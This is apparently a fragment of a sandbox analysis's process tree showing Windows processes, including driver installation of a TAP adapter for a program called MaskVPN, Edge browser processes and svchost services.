C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1e889a88-98f9-324b-a015-5e62d55be168}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6540
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵PID:4416
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7052
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5544
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:5540
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5288
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7224
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7820
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7424